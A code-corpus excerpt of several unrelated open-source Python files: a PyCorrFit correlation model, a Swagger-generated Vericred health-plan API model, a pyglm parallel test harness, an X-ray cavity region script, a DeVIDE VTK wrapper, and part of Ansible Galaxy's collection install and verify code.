        [4] τ_trip₂ Characteristic residence time in triplet state
        [5] T₂      Fraction of particles in triplet (non-fluorescent) state
                    0 <= T < 1
        [6] offset
        *tau* - lag time
    """
    # Unpack the parameter vector (ordering documented above)
    n = parms[0]
    taud = parms[1]
    tautrip1 = parms[2]
    T1 = parms[3]
    tautrip2 = parms[4]
    T2 = parms[5]
    off = parms[6]

    # 2D diffusion term and the two triplet/blinking factors
    # (twod/trip are the shared confocal/triplet helpers of this package)
    g = twod(tau=tau, taudiff=taud)
    tr1 = trip(tau=tau, T=T1, tautrip=tautrip1)
    tr2 = trip(tau=tau, T=T2, tautrip=tautrip2)

    G = off + 1/n * g * tr1 * tr2
    return G
def supplements(parms, countrate=None):
    """Return supplementary information derived from the fit parameters.

    Only the counts per particle (CPP) can be derived here, and only when
    a count rate is available.

    :param parms: model parameter list; parms[0] is the particle number n
    :param countrate: measured count rate in kHz, or None
    :return: list of [label, value] pairs (empty without a count rate)
    """
    n = parms[0]
    info = []
    if countrate is not None:
        # counts per particle = count rate / effective particle number
        info.append(["cpp [kHz]", countrate / n])
    return info
# Default starting values for the 7 model parameters (same ordering as in
# the CF_Gxy_gauss_2DTT docstring)
parms = [
    4,      # n
    .4,     # taud
    0.001,  # tautrip1
    0.01,   # T1
    0.002,  # tautrip2
    0.01,   # T2
    0.0     # offset
]

# Boundaries
# strictly positive
boundaries = [[0, np.inf]]*len(parms)
# T: triplet fractions must stay below 1
boundaries[3] = [0, .9999999999999]
boundaries[5] = [0, .9999999999999]
# offset may be negative
boundaries[-1] = [-np.inf, np.inf]

# Register model 6003 with the PyCorrFit model machinery; the constraints
# enforce tautrip1 < taud and tautrip2 > tautrip1, and the hr (human
# readable) factors convert the triplet times from ms to µs for display.
model_setup(
    modelid=6003,
    name="2D diffusion with double triplet (confocal)",
    comp="T+T+2D",
    mtype="Confocal (Gaussian) with double triplet",
    fctn=CF_Gxy_gauss_2DTT,
    par_labels=[
        u"n",
        u"τ_diff [ms]",
        u"τ_trip₁ [ms]",
        u"T₁",
        u"τ_trip₂ [ms]",
        u"T₂",
        u"offset"
    ],
    par_values=parms,
    par_vary=[True, True, False, False, False, False, False],
    par_boundaries=boundaries,
    par_constraints=[[2, "<", 1], [4, ">", 2]],
    par_hr_labels=[
        u"n",
        u"τ_diff [ms]",
        u"τ_trip₁ [µs]",
        u"T₁",
        u"τ_trip₂ [µs]",
        u"T₂",
        u"offset"
    ],
    par_hr_factors=[
        1.,     # n
        1.,     # taudiff
        1000.,  # tautrip1 [µs]
        1.,     # T1
        1000.,  # tautrip2 [µs]
        1.,     # T2
        1.      # offset
    ],
    supplementary_method=supplements
)
| paulmueller/PyCorrFit | pycorrfit/models/model_confocal_tt_2d.py | Python | gpl-2.0 | 3,122 | [
"Gaussian"
] | dc53dd30b4337047143117e371c7e64fd128cd225dd6a38b9280c0076a1e1c99 |
# coding: utf-8
"""
Vericred API
Vericred's API allows you to search for Health Plans that a specific doctor
accepts.
## Getting Started
Visit our [Developer Portal](https://developers.vericred.com) to
create an account.
Once you have created an account, you can create one Application for
Production and another for our Sandbox (select the appropriate Plan when
you create the Application).
## SDKs
Our API follows standard REST conventions, so you can use any HTTP client
to integrate with us. You will likely find it easier to use one of our
[autogenerated SDKs](https://github.com/vericred/?query=vericred-),
which we make available for several common programming languages.
## Authentication
To authenticate, pass the API Key you created in the Developer Portal as
a `Vericred-Api-Key` header.
`curl -H 'Vericred-Api-Key: YOUR_KEY' "https://api.vericred.com/providers?search_term=Foo&zip_code=11215"`
## Versioning
Vericred's API default to the latest version. However, if you need a specific
version, you can request it with an `Accept-Version` header.
The current version is `v3`. Previous versions are `v1` and `v2`.
`curl -H 'Vericred-Api-Key: YOUR_KEY' -H 'Accept-Version: v2' "https://api.vericred.com/providers?search_term=Foo&zip_code=11215"`
## Pagination
Endpoints that accept `page` and `per_page` parameters are paginated. They expose
four additional fields that contain data about your position in the response,
namely `Total`, `Per-Page`, `Link`, and `Page` as described in [RFC-5988](https://tools.ietf.org/html/rfc5988).
For example, to display 5 results per page and view the second page of a
`GET` to `/networks`, your final request would be `GET /networks?....page=2&per_page=5`.
## Sideloading
When we return multiple levels of an object graph (e.g. `Provider`s and their `State`s
we sideload the associated data. In this example, we would provide an Array of
`State`s and a `state_id` for each provider. This is done primarily to reduce the
payload size since many of the `Provider`s will share a `State`
```
{
providers: [{ id: 1, state_id: 1}, { id: 2, state_id: 1 }],
states: [{ id: 1, code: 'NY' }]
}
```
If you need the second level of the object graph, you can just match the
corresponding id.
## Selecting specific data
All endpoints allow you to specify which fields you would like to return.
This allows you to limit the response to contain only the data you need.
For example, let's take a request that returns the following JSON by default
```
{
provider: {
id: 1,
name: 'John',
phone: '1234567890',
field_we_dont_care_about: 'value_we_dont_care_about'
},
states: [{
id: 1,
name: 'New York',
code: 'NY',
field_we_dont_care_about: 'value_we_dont_care_about'
}]
}
```
To limit our results to only return the fields we care about, we specify the
`select` query string parameter for the corresponding fields in the JSON
document.
In this case, we want to select `name` and `phone` from the `provider` key,
so we would add the parameters `select=provider.name,provider.phone`.
We also want the `name` and `code` from the `states` key, so we would
add the parameters `select=states.name,states.code`. The id field of
each document is always returned whether or not it is requested.
Our final request would be `GET /providers/12345?select=provider.name,provider.phone,states.name,states.code`
The response would be
```
{
provider: {
id: 1,
name: 'John',
phone: '1234567890'
},
states: [{
id: 1,
name: 'New York',
code: 'NY'
}]
}
```
## Benefits summary format
Benefit cost-share strings are formatted to capture:
* Network tiers
* Compound or conditional cost-share
* Limits on the cost-share
* Benefit-specific maximum out-of-pocket costs
**Example #1**
As an example, we would represent [this Summary of Benefits & Coverage](https://s3.amazonaws.com/vericred-data/SBC/2017/33602TX0780032.pdf) as:
* **Hospital stay facility fees**:
- Network Provider: `$400 copay/admit plus 20% coinsurance`
- Out-of-Network Provider: `$1,500 copay/admit plus 50% coinsurance`
- Vericred's format for this benefit: `In-Network: $400 before deductible then 20% after deductible / Out-of-Network: $1,500 before deductible then 50% after deductible`
* **Rehabilitation services:**
- Network Provider: `20% coinsurance`
- Out-of-Network Provider: `50% coinsurance`
- Limitations & Exceptions: `35 visit maximum per benefit period combined with Chiropractic care.`
- Vericred's format for this benefit: `In-Network: 20% after deductible / Out-of-Network: 50% after deductible | limit: 35 visit(s) per Benefit Period`
**Example #2**
In [this other Summary of Benefits & Coverage](https://s3.amazonaws.com/vericred-data/SBC/2017/40733CA0110568.pdf), the **specialty_drugs** cost-share has a maximum out-of-pocket for in-network pharmacies.
* **Specialty drugs:**
- Network Provider: `40% coinsurance up to a $500 maximum for up to a 30 day supply`
- Out-of-Network Provider `Not covered`
- Vericred's format for this benefit: `In-Network: 40% after deductible, up to $500 per script / Out-of-Network: 100%`
**BNF**
Here's a description of the benefits summary string, represented as a context-free grammar:
```
root ::= coverage
coverage ::= (simple_coverage | tiered_coverage) (space pipe space coverage_modifier)?
tiered_coverage ::= tier (space slash space tier)*
tier ::= tier_name colon space (tier_coverage | not_applicable)
tier_coverage ::= simple_coverage (space (then | or | and) space simple_coverage)* tier_limitation?
simple_coverage ::= (pre_coverage_limitation space)? coverage_amount (space post_coverage_limitation)? (comma? space coverage_condition)?
coverage_modifier ::= limit_condition colon space (((simple_coverage | simple_limitation) (semicolon space see_carrier_documentation)?) | see_carrier_documentation | waived_if_admitted | shared_across_tiers)
waived_if_admitted ::= ("copay" space)? "waived if admitted"
simple_limitation ::= pre_coverage_limitation space "copay applies"
tier_name ::= "In-Network-Tier-2" | "Out-of-Network" | "In-Network"
limit_condition ::= "limit" | "condition"
tier_limitation ::= comma space "up to" space (currency | (integer space time_unit plural?)) (space post_coverage_limitation)?
coverage_amount ::= currency | unlimited | included | unknown | percentage | (digits space (treatment_unit | time_unit) plural?)
pre_coverage_limitation ::= first space digits space time_unit plural?
post_coverage_limitation ::= (((then space currency) | "per condition") space)? "per" space (treatment_unit | (integer space time_unit) | time_unit) plural?
coverage_condition ::= ("before deductible" | "after deductible" | "penalty" | allowance | "in-state" | "out-of-state") (space allowance)?
allowance ::= upto_allowance | after_allowance
upto_allowance ::= "up to" space (currency space)? "allowance"
after_allowance ::= "after" space (currency space)? "allowance"
see_carrier_documentation ::= "see carrier documentation for more information"
shared_across_tiers ::= "shared across all tiers"
unknown ::= "unknown"
unlimited ::= /[uU]nlimited/
included ::= /[iI]ncluded in [mM]edical/
time_unit ::= /[hH]our/ | (((/[cC]alendar/ | /[cC]ontract/) space)? /[yY]ear/) | /[mM]onth/ | /[dD]ay/ | /[wW]eek/ | /[vV]isit/ | /[lL]ifetime/ | ((((/[bB]enefit/ plural?) | /[eE]ligibility/) space)? /[pP]eriod/)
treatment_unit ::= /[pP]erson/ | /[gG]roup/ | /[cC]ondition/ | /[sS]cript/ | /[vV]isit/ | /[eE]xam/ | /[iI]tem/ | /[sS]tay/ | /[tT]reatment/ | /[aA]dmission/ | /[eE]pisode/
comma ::= ","
colon ::= ":"
semicolon ::= ";"
pipe ::= "|"
slash ::= "/"
plural ::= "(s)" | "s"
then ::= "then" | ("," space) | space
or ::= "or"
and ::= "and"
not_applicable ::= "Not Applicable" | "N/A" | "NA"
first ::= "first"
currency ::= "$" number
percentage ::= number "%"
number ::= float | integer
float ::= digits "." digits
integer ::= /[0-9]/+ (comma_int | under_int)*
comma_int ::= ("," /[0-9]/*3) !"_"
under_int ::= ("_" /[0-9]/*3) !","
digits ::= /[0-9]/+ ("_" /[0-9]/+)*
space ::= /[ \t]/+
```
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class BasePlanSearchResponse(object):
    """Swagger model describing a base plan search response.

    NOTE: Originally produced by the swagger code generator program;
    edit with care.
    """

    def __init__(self, meta=None, coverages=None):
        """Create the model.

        :param meta: Meta-data (swagger type ``Meta``).
        :param coverages: Coverages associated with the plan
            (swagger type ``list[DrugCoverage]``).
        """
        # attribute name -> swagger type, consumed by to_dict()/serializers
        self.swagger_types = {
            'meta': 'Meta',
            'coverages': 'list[DrugCoverage]'
        }
        # attribute name -> JSON key in the API definition
        self.attribute_map = {
            'meta': 'meta',
            'coverages': 'coverages'
        }

        self._meta = meta
        self._coverages = coverages

    @property
    def meta(self):
        """Meta-data of this BasePlanSearchResponse (type ``Meta``)."""
        return self._meta

    @meta.setter
    def meta(self, meta):
        """Set the meta-data of this BasePlanSearchResponse."""
        self._meta = meta

    @property
    def coverages(self):
        """Coverages associated with the plan (``list[DrugCoverage]``)."""
        return self._coverages

    @coverages.setter
    def coverages(self, coverages):
        """Set the coverages associated with the plan."""
        self._coverages = coverages

    def to_dict(self):
        """Return the model's properties as a plain dict.

        Nested swagger models (anything exposing ``to_dict``) found
        directly in attributes, lists or dict values are converted too.
        """
        output = {}
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                output[attr] = [
                    item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value
                ]
            elif hasattr(value, "to_dict"):
                output[attr] = value.to_dict()
            elif isinstance(value, dict):
                output[attr] = dict(
                    (key, val.to_dict() if hasattr(val, "to_dict") else val)
                    for key, val in value.items()
                )
            else:
                output[attr] = value
        return output

    def to_str(self):
        """Return the string representation of the model."""
        return pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Two responses are equal when all their attributes match."""
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inverse of ``__eq__``."""
        return not self == other
| vericred/vericred-python | vericred_client/models/base_plan_search_response.py | Python | apache-2.0 | 12,846 | [
"VisIt"
] | 7904bc86b07e3f8cc1b8028c198fbedbff190534c47e639ae83033f03b4c2e0c |
import os
import cPickle
from IPython.parallel import Client
from pyglm.utils.parallel_util import initialize_imports, create_population_on_engines
from pyglm.utils.io import parse_cmd_line_args, load_data
from population import Population
from pyglm.models.model_factory import *
def initialize_parallel_test_harness():
    """Set up a parallel population test harness (Python 2).

    Parses command line options, loads (or synthesizes) the dataset,
    builds a master Population on this process, optionally loads the
    ground-truth model/state the data was generated from, and finally
    creates per-engine Population objects through an IPython.parallel
    direct view.

    Returns (options, popn, data, client, popn_true, x_true); popn_true
    and x_true are None unless the data carries the true latent
    variables under 'vars'.
    """
    # Parse command line args
    (options, args) = parse_cmd_line_args()

    # Load data from file or create synthetic test dataset
    data = load_data(options)

    print "Creating master population object"
    model = make_model(options.model, N=data['N'])
    stabilize_sparsity(model)
    popn = Population(model)
    popn.set_data(data)

    # Initialize the GLM with the data
    popn_true = None
    x_true = None
    if 'vars' in data:
        x_true = data['vars']

        # Load the true model from model.pkl next to the data file
        data_dir = os.path.dirname(options.dataFile)
        model_file = os.path.join(data_dir, 'model.pkl')
        print "Loading true model from %s" % model_file
        with open(model_file) as f:
            model_true = cPickle.load(f)

        # HACK FOR EXISTING DATA!
        # Older pickled models predate some graph options; patch them in
        # so Population() does not fail on missing keys.
        if 'N_dims' not in model_true['network']['graph']:
            model_true['network']['graph']['N_dims'] = 1
        if 'location_prior' not in model_true['network']['graph']:
            model_true['network']['graph']['location_prior'] = \
                {
                    'type' : 'gaussian',
                    'mu' : 0.0,
                    'sigma' : 1.0
                }
        if 'L' in x_true['net']['graph']:
            x_true['net']['graph']['L'] = x_true['net']['graph']['L'].ravel()
        # END HACK

        popn_true = Population(model_true)
        popn_true.set_data(data)

    # Create a client with direct view to all engines
    if options.json is not None:
        client = Client(options.json)
    else:
        client = Client(profile=options.profile)
    dview = client[:]
    print "Found %d engines." % len(dview)

    print "Initializing imports on each engine"
    initialize_imports(dview)

    print "Creating population objects on each engine"
    create_population_on_engines(dview, data, options.model)

    return options, popn, data, client, popn_true, x_true
| slinderman/theano_pyglm | test/parallel_harness.py | Python | mit | 2,396 | [
"Gaussian"
] | 3d51c7427d02eb2b693e197adcdbb6e95dc1b61c1f5a7a1111b9705067da6161 |
# Copyright (C) 2016 Zhixian MA <zxma_sjtu@qq.com>
"""
Transform cavities regions of samples selected from paper
arXiv-1610.03487.
Reference
---------
[1] J. Shin, J. Woo, and, J. Mulchaey
"A systematic search for X-ray cavities in galaxy clusters,
groups, and elliptical galaxies"
arXiv-1610.03487
"""
import os
import argparse
import cnn_utils as utils
def main():
    """Transform cavity regions for every sample under the given path.

    Command line arguments:
        inpath  directory holding one sub-directory per sample

    For each sample, the redshift is looked up, the conversion rate is
    computed and the sample's 'cavities.reg' region file is converted to
    kpc units in place. One log line per processed sample is appended to
    'sample_z.log'.
    """
    parser = argparse.ArgumentParser(description="Region transform")
    parser.add_argument("inpath", help="path holding the samples.")
    args = parser.parse_args()
    # Bail out early if the input path cannot be listed
    try:
        samples = os.listdir(args.inpath)
    except IOError:
        print("Inpath does not exist.")
        return
    # Use a context manager so the log file is always closed
    # (fix: the original handle was opened but never closed).
    with open("sample_z.log", 'a') as fp:
        for s in samples:
            print("Processing on %s..." % s)
            # get_redshift() returns -1 when the sample has no redshift entry
            z = utils.get_redshift(s)
            if z == -1:
                continue
            rate = utils.calc_rate(z)
            fp.write("%s\t%f\t%f\n" % (s, z, rate))
            # Convert the region file to kpc units in place
            sample_path = args.inpath + '/' + s + '/'
            regpath = os.path.join(sample_path, 'cavities.reg')
            print(regpath)
            utils.reg_exchange(regpath, rate, unit='kpc')


if __name__ == "__main__":
    main()
| myinxd/cavdet | cnn/getReg.py | Python | mit | 1,385 | [
"Galaxy"
] | e1a763f962ee01f5918047d445cfc3385e8e0725654afcd06accf11af49a0b9d |
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkImageDifference(SimpleVTKClassModuleBase):
    # DeVIDE module wrapper around VTK's vtkImageDifference filter.
    def __init__(self, module_manager):
        # Two vtkImageData inputs, one vtkImageData output, listed under
        # the 'Processing.' category; replaceDoc=True pulls in the VTK
        # class documentation for the module help.
        SimpleVTKClassModuleBase.__init__(
            self, module_manager,
            vtk.vtkImageDifference(), 'Processing.',
            ('vtkImageData', 'vtkImageData'), ('vtkImageData',),
            replaceDoc=True,
            inputFunctions=None, outputFunctions=None)
| chrisidefix/devide | modules/vtk_basic/vtkImageDifference.py | Python | bsd-3-clause | 508 | [
"VTK"
] | 53a46d260875d64e90b09d668288ba021d49cb92471a0f004be068fed8fcdfe5 |
# Copyright: (c) 2019, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import fnmatch
import json
import operator
import os
import shutil
import stat
import sys
import tarfile
import tempfile
import threading
import time
import yaml
from collections import namedtuple
from contextlib import contextmanager
from distutils.version import LooseVersion
from hashlib import sha256
from io import BytesIO
from yaml.error import YAMLError
try:
import queue
except ImportError:
import Queue as queue # Python 2
import ansible.constants as C
from ansible.errors import AnsibleError
from ansible.galaxy import get_collections_galaxy_meta_info
from ansible.galaxy.api import CollectionVersionMetadata, GalaxyError
from ansible.galaxy.user_agent import user_agent
from ansible.module_utils import six
from ansible.module_utils._text import to_bytes, to_native, to_text
from ansible.utils.collection_loader import AnsibleCollectionRef
from ansible.utils.display import Display
from ansible.utils.hashing import secure_hash, secure_hash_s
from ansible.utils.version import SemanticVersion
from ansible.module_utils.urls import open_url
urlparse = six.moves.urllib.parse.urlparse
urllib_error = six.moves.urllib.error
display = Display()
# Version of the MANIFEST.json format produced/consumed by this module
MANIFEST_FORMAT = 1

# (filename, expected checksum, installed checksum) for a file that failed
# verification
ModifiedContent = namedtuple('ModifiedContent', ['filename', 'expected', 'installed'])
class CollectionRequirement:

    # Tar members that map onto metadata attributes when loading an
    # artifact: MANIFEST.json -> manifest_file, FILES.json -> files_file.
    _FILE_MAPPING = [(b'MANIFEST.json', 'manifest_file'), (b'FILES.json', 'files_file')]
    def __init__(self, namespace, name, b_path, api, versions, requirement, force, parent=None, metadata=None,
                 files=None, skip=False, allow_pre_releases=False):
        """
        Represents a collection requirement, the versions that are available to be installed as well as any
        dependencies the collection has.

        :param namespace: The collection namespace.
        :param name: The collection name.
        :param b_path: Byte str of the path to the collection tarball if it has already been downloaded.
        :param api: The GalaxyAPI to use if the collection is from Galaxy.
        :param versions: A list of versions of the collection that are available.
        :param requirement: The version requirement string used to verify the list of versions fit the requirements.
        :param force: Whether the force flag applied to the collection.
        :param parent: The name of the parent the collection is a dependency of.
        :param metadata: The galaxy.api.CollectionVersionMetadata that has already been retrieved from the Galaxy
            server.
        :param files: The files that exist inside the collection. This is based on the FILES.json file inside the
            collection artifact.
        :param skip: Whether to skip installing the collection. Should be set if the collection is already installed
            and force is not set.
        :param allow_pre_releases: Whether to skip pre-release versions of collections.
        """
        self.namespace = namespace
        self.name = name
        self.b_path = b_path
        self.api = api
        self._versions = set(versions)
        self.force = force
        self.skip = skip
        self.required_by = []  # list of (parent, requirement) tuples
        self.allow_pre_releases = allow_pre_releases

        self._metadata = metadata
        self._files = files

        # Validates the initial requirement and narrows self.versions to
        # the versions that satisfy it (raises AnsibleError otherwise).
        self.add_requirement(parent, requirement)
def __str__(self):
return to_native("%s.%s" % (self.namespace, self.name))
def __unicode__(self):
return u"%s.%s" % (self.namespace, self.name)
@property
def metadata(self):
self._get_metadata()
return self._metadata
@property
def versions(self):
if self.allow_pre_releases:
return self._versions
return set(v for v in self._versions if v == '*' or not SemanticVersion(v).is_prerelease)
@versions.setter
def versions(self, value):
self._versions = set(value)
@property
def pre_releases(self):
return set(v for v in self._versions if SemanticVersion(v).is_prerelease)
@property
def latest_version(self):
try:
return max([v for v in self.versions if v != '*'], key=SemanticVersion)
except ValueError: # ValueError: max() arg is an empty sequence
return '*'
@property
def dependencies(self):
if not self._metadata:
if len(self.versions) > 1:
return {}
self._get_metadata()
dependencies = self._metadata.dependencies
if dependencies is None:
return {}
return dependencies
    def add_requirement(self, parent, requirement):
        """Record a version requirement and narrow the candidate versions.

        :param parent: Name of the collection that asked for this requirement,
            or None for a direct (user-specified) requirement.
        :param requirement: Version requirement string (e.g. '*', '>=1.0.0').
        :raises AnsibleError: when no known version satisfies the combined
            requirements; the message explains which requirement failed and
            lists the versions that were still available.
        """
        self.required_by.append((parent, requirement))
        new_versions = set(v for v in self.versions if self._meets_requirements(v, requirement, parent))
        if len(new_versions) == 0:
            if self.skip:
                # Already installed at a version that conflicts with the new
                # requirement; the user has to force the overwrite.
                force_flag = '--force-with-deps' if parent else '--force'
                version = self.latest_version if self.latest_version != '*' else 'unknown'
                msg = "Cannot meet requirement %s:%s as it is already installed at version '%s'. Use %s to overwrite" \
                      % (to_text(self), requirement, version, force_flag)
                raise AnsibleError(msg)
            elif parent is None:
                msg = "Cannot meet requirement %s for dependency %s" % (requirement, to_text(self))
            else:
                msg = "Cannot meet dependency requirement '%s:%s' for collection %s" \
                      % (to_text(self), requirement, parent)

            collection_source = to_text(self.b_path, nonstring='passthru') or self.api.api_server
            # One line per recorded requirement, attributed to its requester
            req_by = "\n".join(
                "\t%s - '%s:%s'" % (to_text(p) if p else 'base', to_text(self), r)
                for p, r in self.required_by
            )

            versions = ", ".join(sorted(self.versions, key=SemanticVersion))
            if not self.versions and self.pre_releases:
                # Only pre-releases exist; hint at the --pre flag
                pre_release_msg = (
                    '\nThis collection only contains pre-releases. Utilize `--pre` to install pre-releases, or '
                    'explicitly provide the pre-release version.'
                )
            else:
                pre_release_msg = ''

            raise AnsibleError(
                "%s from source '%s'. Available versions before last requirement added: %s\nRequirements from:\n%s%s"
                % (msg, collection_source, versions, req_by, pre_release_msg)
            )

        self.versions = new_versions
def download(self, b_path):
download_url = self._metadata.download_url
artifact_hash = self._metadata.artifact_sha256
headers = {}
self.api._add_auth_token(headers, download_url, required=False)
b_collection_path = _download_file(download_url, b_path, artifact_hash, self.api.validate_certs,
headers=headers)
return to_text(b_collection_path, errors='surrogate_or_strict')
    def install(self, path, b_temp_path):
        """Install the collection under ``<path>/<namespace>/<name>``.

        Downloads the artifact first when it is not already on disk, then
        extracts MANIFEST.json, FILES.json and every file listed in the
        file manifest (each file checksum-verified) into the target
        directory. A pre-existing installation is removed first, and the
        target directory is cleaned up again if the extraction fails.
        """
        if self.skip:
            display.display("Skipping '%s' as it is already installed" % to_text(self))
            return

        # Install if it is not
        collection_path = os.path.join(path, self.namespace, self.name)
        b_collection_path = to_bytes(collection_path, errors='surrogate_or_strict')
        display.display("Installing '%s:%s' to '%s'" % (to_text(self), self.latest_version, collection_path))

        if self.b_path is None:
            self.b_path = self.download(b_temp_path)

        # Replace any existing installation wholesale
        if os.path.exists(b_collection_path):
            shutil.rmtree(b_collection_path)
        os.makedirs(b_collection_path)

        try:
            with tarfile.open(self.b_path, mode='r') as collection_tar:
                # Read the file manifest first; it drives the extraction
                files_member_obj = collection_tar.getmember('FILES.json')
                with _tarfile_extract(collection_tar, files_member_obj) as files_obj:
                    files = json.loads(to_text(files_obj.read(), errors='surrogate_or_strict'))

                _extract_tar_file(collection_tar, 'MANIFEST.json', b_collection_path, b_temp_path)
                _extract_tar_file(collection_tar, 'FILES.json', b_collection_path, b_temp_path)

                for file_info in files['files']:
                    file_name = file_info['name']
                    if file_name == '.':
                        continue

                    if file_info['ftype'] == 'file':
                        # Each file is verified against its FILES.json sha256
                        _extract_tar_file(collection_tar, file_name, b_collection_path, b_temp_path,
                                          expected_hash=file_info['chksum_sha256'])
                    else:
                        os.makedirs(os.path.join(b_collection_path, to_bytes(file_name, errors='surrogate_or_strict')), mode=0o0755)
        except Exception:
            # Ensure we don't leave the dir behind in case of a failure.
            shutil.rmtree(b_collection_path)

            # Also drop the namespace dir if this was its only collection
            b_namespace_path = os.path.dirname(b_collection_path)
            if not os.listdir(b_namespace_path):
                os.rmdir(b_namespace_path)
            raise
def set_latest_version(self):
self.versions = set([self.latest_version])
self._get_metadata()
    def verify(self, remote_collection, path, b_temp_tar_path):
        """Compare the installed collection's file checksums against the remote artifact's manifests.

        Mismatches are reported through ``display``; this method never raises on content mismatch.

        :param remote_collection: CollectionRequirement resolved from a Galaxy server for comparison.
        :param path: Root collections path the installed collection lives under.
        :param b_temp_tar_path: Byte-string path to the downloaded remote artifact tarball.
        """
        if not self.skip:
            # Only collections discovered as installed (skip=True) can be verified locally.
            display.display("'%s' has not been installed, nothing to verify" % (to_text(self)))
            return

        collection_path = os.path.join(path, self.namespace, self.name)
        b_collection_path = to_bytes(collection_path, errors='surrogate_or_strict')

        display.vvv("Verifying '%s:%s'." % (to_text(self), self.latest_version))
        display.vvv("Installed collection found at '%s'" % collection_path)
        display.vvv("Remote collection found at '%s'" % remote_collection.metadata.download_url)

        # Compare installed version versus requirement version
        if self.latest_version != remote_collection.latest_version:
            err = "%s has the version '%s' but is being compared to '%s'" % (to_text(self), self.latest_version, remote_collection.latest_version)
            display.display(err)
            return

        modified_content = []

        # Verify the manifest hash matches before verifying the file manifest
        expected_hash = _get_tar_file_hash(b_temp_tar_path, 'MANIFEST.json')
        self._verify_file_hash(b_collection_path, 'MANIFEST.json', expected_hash, modified_content)
        manifest = _get_json_from_tar_file(b_temp_tar_path, 'MANIFEST.json')

        # Use the manifest to verify the file manifest checksum
        file_manifest_data = manifest['file_manifest_file']
        file_manifest_filename = file_manifest_data['name']
        expected_hash = file_manifest_data['chksum_%s' % file_manifest_data['chksum_type']]

        # Verify the file manifest before using it to verify individual files
        self._verify_file_hash(b_collection_path, file_manifest_filename, expected_hash, modified_content)
        file_manifest = _get_json_from_tar_file(b_temp_tar_path, file_manifest_filename)

        # Use the file manifest to verify individual file checksums
        for manifest_data in file_manifest['files']:
            if manifest_data['ftype'] == 'file':
                expected_hash = manifest_data['chksum_%s' % manifest_data['chksum_type']]
                self._verify_file_hash(b_collection_path, manifest_data['name'], expected_hash, modified_content)

        if modified_content:
            display.display("Collection %s contains modified content in the following files:" % to_text(self))
            display.display(to_text(self))
            display.vvv(to_text(self.b_path))
            for content_change in modified_content:
                display.display(' %s' % content_change.filename)
                display.vvv(" Expected: %s\n Found: %s" % (content_change.expected, content_change.installed))
        else:
            display.vvv("Successfully verified that checksums for '%s:%s' match the remote collection" % (to_text(self), self.latest_version))
def _verify_file_hash(self, b_path, filename, expected_hash, error_queue):
b_file_path = to_bytes(os.path.join(to_text(b_path), filename), errors='surrogate_or_strict')
if not os.path.isfile(b_file_path):
actual_hash = None
else:
with open(b_file_path, mode='rb') as file_object:
actual_hash = _consume_file(file_object)
if expected_hash != actual_hash:
error_queue.append(ModifiedContent(filename=filename, expected=expected_hash, installed=actual_hash))
def _get_metadata(self):
if self._metadata:
return
self._metadata = self.api.get_collection_version_metadata(self.namespace, self.name, self.latest_version)
    def _meets_requirements(self, version, requirements, parent):
        """Return True when *version* satisfies every comma-delimited entry in *requirements*.

        Supported operators: '==', '!=', '>', '>=', '<', '<=', '=' and '*'; a bare version
        string is treated as an exact ('==') match.
        """
        op_map = {
            '!=': operator.ne,
            '==': operator.eq,
            '=': operator.eq,
            '>=': operator.ge,
            '>': operator.gt,
            '<=': operator.le,
            '<': operator.lt,
        }

        for req in list(requirements.split(',')):
            # Two-character operators always have '=' as their second character (==, !=, >=, <=).
            op_pos = 2 if len(req) > 1 and req[1] == '=' else 1
            op = op_map.get(req[:op_pos])

            requirement = req[op_pos:]
            if not op:
                # No recognised operator prefix: the whole token is a version, matched exactly.
                requirement = req
                op = operator.eq

                # In the case we are checking a new requirement on a base requirement (parent != None) we can't accept
                # version as '*' (unknown version) unless the requirement is also '*'.
                if parent and version == '*' and requirement != '*':
                    display.warning("Failed to validate the collection requirement '%s:%s' for %s when the existing "
                                    "install does not have a version set, the collection may not work."
                                    % (to_text(self), req, parent))
                    continue
                elif requirement == '*' or version == '*':
                    continue

            if not op(SemanticVersion(version), SemanticVersion.from_loose_version(LooseVersion(requirement))):
                break
        else:
            # Every requirement passed without breaking out of the loop.
            return True

        # The loop was broken early, it does not meet all the requirements
        return False
    @staticmethod
    def from_tar(b_path, force, parent=None):
        """Create a CollectionRequirement from a collection artifact tarball on disk.

        :param b_path: Byte-string path to the .tar.gz artifact.
        :param force: Whether this requirement is being force (re)installed.
        :param parent: Name of the requirement's parent when resolved as a dependency.
        :raises AnsibleError: If the file is not a tar archive or required members are missing/invalid.
        :return: A new CollectionRequirement pinned to the artifact's version.
        """
        if not tarfile.is_tarfile(b_path):
            raise AnsibleError("Collection artifact at '%s' is not a valid tar file." % to_native(b_path))

        info = {}
        with tarfile.open(b_path, mode='r') as collection_tar:
            # _FILE_MAPPING pairs required archive members with the info keys used below
            # ('manifest_file', 'files_file' per the later lookups).
            for b_member_name, property_name in CollectionRequirement._FILE_MAPPING:
                n_member_name = to_native(b_member_name)
                try:
                    member = collection_tar.getmember(n_member_name)
                except KeyError:
                    raise AnsibleError("Collection at '%s' does not contain the required file %s."
                                       % (to_native(b_path), n_member_name))

                with _tarfile_extract(collection_tar, member) as member_obj:
                    try:
                        info[property_name] = json.loads(to_text(member_obj.read(), errors='surrogate_or_strict'))
                    except ValueError:
                        raise AnsibleError("Collection tar file member %s does not contain a valid json string."
                                           % n_member_name)

        meta = info['manifest_file']['collection_info']
        files = info['files_file']['files']

        namespace = meta['namespace']
        name = meta['name']
        version = meta['version']
        meta = CollectionVersionMetadata(namespace, name, version, None, None, meta['dependencies'])

        # An explicitly supplied pre-release artifact is allowed to install as-is.
        if SemanticVersion(version).is_prerelease:
            allow_pre_release = True
        else:
            allow_pre_release = False

